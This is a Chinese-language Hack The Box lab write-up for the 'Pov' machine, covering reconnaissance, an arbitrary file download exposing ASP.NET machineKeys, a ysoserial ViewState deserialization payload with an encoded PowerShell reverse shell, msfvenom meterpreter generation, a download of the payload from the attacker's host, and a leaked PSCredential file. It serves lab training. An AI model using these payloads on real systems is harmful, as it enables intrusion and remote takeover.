Hack The Box - Pov

字数统计: 1.6k阅读时长: 8 min

 2024/02/06

Hack The Box靶场 Sesson 4 WEEK 4 Pov靶机

靶机IP：10.10.11.251

信息收集

nmap扫一波

┌──(kali㉿kali)-[~]
└─$ nmap -sn 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:38 CST
Nmap scan report for 10.10.11.251
Host is up (0.33s latency).
Nmap done: 1 IP address (1 host up) scanned in 0.34 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT --min-rate 10000 -p- 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:41 CST
Nmap scan report for 10.10.11.251
Host is up (0.00028s latency).
All 65535 scanned ports on 10.10.11.251 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 13.47 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sU --min-rate 10000 -p- 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:41 CST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.23 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -sTCV -O 10.10.11.251
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-03 14:42 CST
Nmap scan report for 10.10.11.251
Host is up (0.28s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: pov.htb
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows XP SP3 or Windows 7 or Windows Server 2012 (96%), Microsoft Windows XP SP3 (94%), VMware Player virtual NAT device (94%), Actiontec MI424WR-GEN3I WAP (92%), DD-WRT v24-sp2 (Linux 2.4.37) (92%), Linux 3.2 (89%), Linux 4.4 (89%), DVTel DVT-9540DW network camera (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.35 seconds

得到一个网站。

Web渗透

目录爆破

┌──(kali㉿kali)-[~]
└─$ sudo dirsearch -u "http://10.10.11.251/" -i 200
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /home/kali/reports/http_10.10.11.251/__24-02-03_15-31-54.txt

Target: http://10.10.11.251/

[15:31:54] Starting:

Task Completed

啥也没有。看到网页下面有个域名

子域名爆破

试试子域名爆破

┌──(kali㉿kali)-[~]
└─$ sudo gobuster dns -d pov.htb -w /usr/share/wordlists/seclists/Discovery/DNS/shubs-subdomains.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     pov.htb
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/wordlists/seclists/Discovery/DNS/shubs-subdomains.txt
===============================================================
Starting gobuster in DNS enumeration mode
===============================================================
[INFO] [-] Unable to validate base domain: pov.htb (lookup pov.htb: i/o timeout)
Found: dev.pov.htb

Progress: 377 / 484700 (0.08%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 377 / 484700 (0.08%)
===============================================================
Finished
===============================================================

得到域名dev.pov.htb。添加host，看一下是啥东西

任意文件下载测试

发现可以下载文件

Burp抓包试一下

存在漏洞。下载web配置文件下来

得到XML

<configuration>  
    <system.web>  
        <customErrors mode="On" defaultRedirect="default.aspx"/>  
        <httpRuntime targetFramework="4.5"/>  
        <machineKey decryption="AES" decryptionKey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43"  
                    validation="SHA1"  
                    validationKey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"/>  
    </system.web>  
    <system.webServer>  
        <httpErrors>  
            <remove statusCode="403" subStatusCode="-1"/>  
            <error statusCode="403" prefixLanguageFilePath="" path="http://dev.pov.htb:8080/portfolio"  
                   responseMode="Redirect"/>  
        </httpErrors>  
        <httpRedirect enabled="true" destination="http://dev.pov.htb/portfolio" exactDestination="false"  
                      childOnly="true"/>  
    </system.webServer>  
</configuration>

一个AES，没密钥搞不了；一个SHA1，没解出来。

ViewState反序列化漏洞

特征分析，发现可能存在ViewState反序列化漏洞。

漏洞原理请看这篇文章：https://www.cnblogs.com/zpchcbd/p/15112047.html

powershell反弹

由于对面是Windows主机，使用powershell反弹

在线shell生成工具：https://www.revshells.com/

这里注意，IP是VPN分给你的IP，网段问题要搞清楚。

ysoserial生成密文

下载ysoserial.exe：https://github.com/pwntester/ysoserial.net/releases/tag/v1.36

1
2

./ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANAA1ACIALAA5ADAAMAAxACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==" --path="/portfolio/default.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" --validationalg="SHA1" --validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468"

得到密文

BETrzTL1SyqXcduHe0zo2ZqJ33AejOtAFFL%2F6xbIvOcyDK2c3O%2FmCDqD8mYoft72UTCQbJipWAok%2FPMMK6RAYeoK0ZuBJSib3d1BRo630LKmhJrRnsq0hQzT3kfrie2sfKuX5nm6y07wtnnT4b7XtI265kqVB2K8vqNUT9thj4NAnXbXtdj71qWg3wMe3IO0E6CIWWuxDDDQn4WU8S2fUguTl98VEZxEhBHtLRpAJyKLgCvQ%2B4W0HihSBb9p8g9wiVxTlofeuMgquUubk1k1ZKcHawA8RtlohTqXhK9FTUGZyVtKcnVN22TEiJihSnh8A9fc%2Fy8qYpLMEOUY8%2FSh%2BfQ39GLfCmC7x25JYHgLjfR3NrsFP70AaaXrlLLhLddO%2BET53dUyDBE%2FFQO0ZDXrPpw2AyGlsnBQ0cDuw%2Bv4pN3Zon8NWlrGwWcmSTIGbQFDU385sVR5n3Ck4IJUSEX3qGkU5LyiFmUx8%2FMDes3SKSzw3Q96sWZJvKw6Ex8jKErpHOn%2BiPgSMkP8b8HR9wQamC6lxKySvJdQHrS5EBpU3EhYzgOWwKcVIEEgB6dapkN%2Bxkfj3c09hO515LvX2sVIPn14B4D9tIb%2BnsYe3MBmvGdtryQRw247M8%2B4DGvFyvJtDnsp9%2Fvr73RhmTLslzrKou0snokFog42aGVsQsrjSTQW%2FQoik3BAJuy8Ew1naCRcrwXPgpeSWCYqhWFB86RRt8JAzos7iKOmFjA4SmdjVn5FMWN%2BkiFPQYZb8OvKxQEgHamjkH0gPz%2Fss%2BENaqIyEv3x%2B3KxCc5SrRKr5rltBBq7jFXfpAPh9it0aNgAQ172cBOJU%2Bb697whoTQdvjayM3dijpkxDitzoZsK212TT%2FYVDiquJAnf74U6QdovX3kkPk4W%2B8vZLvM3e9kIOOCtfG%2B%2BrCduU%2BoGKk5Af6UMtte%2BvQs2ypNMbLvz3pGqPgVXFGqR8uJNG6NARC2U99dKvGZ%2B0N%2BrdYhTniX9iFzGI0pfDCG9QHvP%2FZV3%2Frh%2Ff68cfFT9TCogpTShpZ2854yMi%2BKFlxvBi7pn4ABqhREc7Dg068ROI5bbmc%2FK4CqJfn2ODq31UuUHxP0NHX7Vj4QfoA2%2FN6djv0E1GfTo%2BprfGRSq7dblE78fN%2BGmGhSTRLdHX3gEVW56hDTSRjZlxDa81d%2BmWn6ohS1ZiHFtMDtFPlwr4v5vQXekVHGrTjwN54Oy5W5PRY8FzKLEMAxy1%2BN4I%2F%2FlotcJ2E0GnQADMrUGMHhbhYI5%2FWWP%2FyHezu6YiOtzLAR2T1DX3Ud8zBTUXYZ2S4H8jeaIpI2FD3QrZn8a48zrRGcUR4YzIH8NsHR11gjBLq8l7HSXkezoYAbSV7%2BYMXeT5FNkkjTjVowCMCGDOMRgks8nNgFuKGMQHP6TA%2BwaGNLTQXhHCWyONuIqnvVcVGb6SfQaAL5zWa6wvKNTYCCglt27%2FJJ6HcBaPfkkbGaZUzFJygckcNkNWK4NwQWY0tJ%2FKXGV5aPzG2%2Fq3QisEmugsfnid5io3onbeH6IsiuaP3KjXmz44twV6Xoxoh0nwCktaE1FmduwzPFIiOySmnDLw3YtEBhKYhWbLFdWZXnChuIHTZWDEsG7Uii4eR0b0uIZxTNxTP2BPegPxWGa%2FhXjjaypXRBt1iyfhdi1Z7ExtSehq6bGoV7gAGYm2keCT2%2BALJ22l3DKoUZzgQbi5kgDVHcxZgf3GyhYKTKVe%2FzsRRLfDQScxAJgg2nUru04IUc0Jho1ENRYapf8gMh2dKciO9mHFVsSM%2BL%2Bj%2Bcjycfplxk3hmfC%2Fx4B40vkhjx3nmhSHNLBeXehqgsHobtBSaH5MhLnjS3iluXUOFnUG6WTNkGiMF%2FeNEJIbKv49VxZp7VV0i7teMUQ30T1gqKhs7NFIw1vgFbVf2PnUs781YMPJmag5g6PLm4mMwoNjhrIFweSvOL1SEtQmqigzl%2B1RmY4WIi3hEg6uhBPDXX%2BUmfED1H2vuMS64ynLrznJxNRl6HtOXCNi6GcvYFv7aZKUoxk4tNustYHo52ufWX25KyNmqT8CnHXq1maeIWGcECIdPb4iN1dmXLR9Ynp0ikMUWJk%2FSXWc7TufdReqw0fj06iCt5IFNlnSC9CJifK3OAIgNqK2wfkZDRadBkIlf42AYMxfVaMspfSD5b8YbA9PX526U4kcYcPLj78CBIgA6wKrJIV4YMhVmp9TkvgDAXOzqKM9QIMVquyzxdqaUntYXAg%2Fgn8Lt1FN%2B06raMe09cZy076gyGpv2KxUG90f%2B9Zk7Su2uaf6G0ddC6vmex0z1%2Fo6vsU7VmEydIiZzxE1MjOIips8HHB3RpPNdGUzQNT%2F53JLzOBty9NSwZKmGRon%2FbB81tzBy%2FCopRoymOS7GysVa7tbtLP7knisbwrQ5NgGQwk7WAxLd1wGAjYqlrKduyysPnjv1Z5YtQcH%2BwRDdCubmyvvCsHmOANCdPltkjZy%2B9WKJF32DawRalgsCEa3GzW%2BuxCbsMXDQDKfLgPe6D7CCRcbY1hcrN6nLgLPNso3dd8Y%2F7zATC%2Fz96PcwjzXzlSggPH6eisN9TFNXyVzQdNg7cB50WV6N8bArIVxTGGgh1hO2RT6r1K0Ph3ExK%2BvLxwuhas%2F%2Bmvq%2FEXmVbiv4ngNIi65p7cJFtCW9hMIMcjGPUPodG5cqcKd0NMxa4qBQBg4Cm4BPLce2MQ0meOMATDs%2FzTK95QLc5LTq2St9cm55nafPlfnIh1ZnrVmElhxSFmfDEkLRZR9W0H1tCthbELNloxN%2Bbxr9qOAksRPGkNgfN2vOuOr4Zj3Pprc3GDx8MBhRUcZjm2wMWWb1oKe%2B4hyhQPTUHRyY4WutlTwtnUQiWDDgm3WKLobhS02vgwilX5my5w7zG%2B6TDIErWrlJBPgHLnCpn%2FnURTBIrv3VKLy2mIs9pptUWXnHs%2BYtDfQANxeLmhvljE4vK43Mt1UYWKU5%2Fv18IX%2F8EhQvjlk%2BfYKO1CGvfYZsxtt2hNlHcITpqYJrS26SNt9JaNcqFla7%2FrAAP7lTvO1g9oOk8BvFqAJxBHXU%2F3D8g03aVGgk1VZlcjajDyuA%3D%3D

得到反弹

kali开启监听

1
2
3

┌──(root㉿Desktop-Trtyr)-[~]
└─# nc -lvnp 9001
listening on [any] 9001 ...

BP重发包，将__VIEWSTATE改为我们的密文。

回到kali查看

得到shell

内网渗透

当前用户

看一下当前用户

1 2	PS C:\windows\system32\inetsrv> whoami pov\sfitz

我们现在是用的sfitz用户，所以先来到该用户下，再进行操作

1	cd C:/Users/sfitz

上传MSF木马

因为VPN的原因，不能用CS木马，这里就用MSF了。

生成一个windows木马

1	msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.45 LPORT=8888 -f exe -o /root/Tools/payload/hack.exe

开启监控

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.45
set LPORT 8888

搭建一个http服务

1	python3 -m http.server 80 --bind 10.10.14.45

得到木马链接：http://10.10.14.45/hack.exe，然后让靶机接受木马

1	Invoke-WebRequest -Uri "http://10.10.14.45:80/hack.exe" -OutFile ".\hack.exe"

成功拿到shell

提权测试

初步提权测试

这里直接用进程迁移达到提权的目的

ps

拿到一堆进程，但是User我们只能看见当前用户的，这里有一个winlogon.exe，这是NT用户登陆程序，我们迁移到这个进程内

1	migrate 544

失败了，这个用户权限太低了。

MSF切换用户

翻一下User用户

有三个用户。看看文档

文档里有一个connection.xml。里头有alaading的账户密码

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">alaading</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000cdfb54340c2929419cc739fe1a35bc88000000000200000000001066000000010000200000003b44db1dda743e1442e77627255768e65ae76e179107379a964fa8ff156cee21000000000e8000000002000020000000c0bd8a88cfd817ef9b7382f050190dae03b7c81add6b398b2d32fa5e5ade3eaa30000000a3d1e27f0b3c29dae1348e8adf92cb104ed1d95e39600486af909cf55e2ac0c239d4f671f79d80e425122845d4ae33b240000000b15cd305782edae7a3a75c7e8e3c7d43bc23eaae88fde733a28e1b9437d3766af01fdf6f2cf99d2a23e389326c786317447330113c5cfa25bc86fb0c6e1edda6</SS>    </Props>
  </Obj>
</Objs>